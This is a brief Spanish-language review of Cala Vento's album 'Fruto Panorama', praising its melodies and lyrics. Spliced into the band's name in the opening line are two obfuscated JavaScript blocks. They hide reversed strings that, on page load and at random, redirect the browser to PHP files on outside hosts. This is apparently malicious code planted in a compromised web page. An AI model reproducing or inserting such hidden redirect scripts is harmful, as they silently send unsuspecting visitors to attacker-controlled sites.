FINALISTA 2 – 2017: FRUTO PANORAMA, DE CALA VENTO, BCORE DISC.

    Cala Ven<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to

    Joan Delgado y Aleix Turón son Cala Vento.

    A primera vista podría pensarse que no son más que uno de esos dúos de batería y guitarra contundentes, pero sería un error quedarse con esa impresión. Fundamentalmente porque, como bien demuestra su segundo largo –“Fruto Panorama” (B-Core, 17)-, son mucho más que eso.

    Cala Vento son una fábrica de melodías adictivas y estribillos de indudable eficacia, ideales para corear en casa o en sus conciertos. Súmenle a eso la frescura de unas letras honestas y con chispa y unas guitarras que navegan entre el pop más enérgico y el post-hardcore menos musculado.

    Ahí están “Antes de él”, “Historias de bufanda” o “Hay que arrimar” para dejarlo claro y para subrayar todo el potencial que, desde la modestia más absoluta, atesoran.

    Joan S. Luna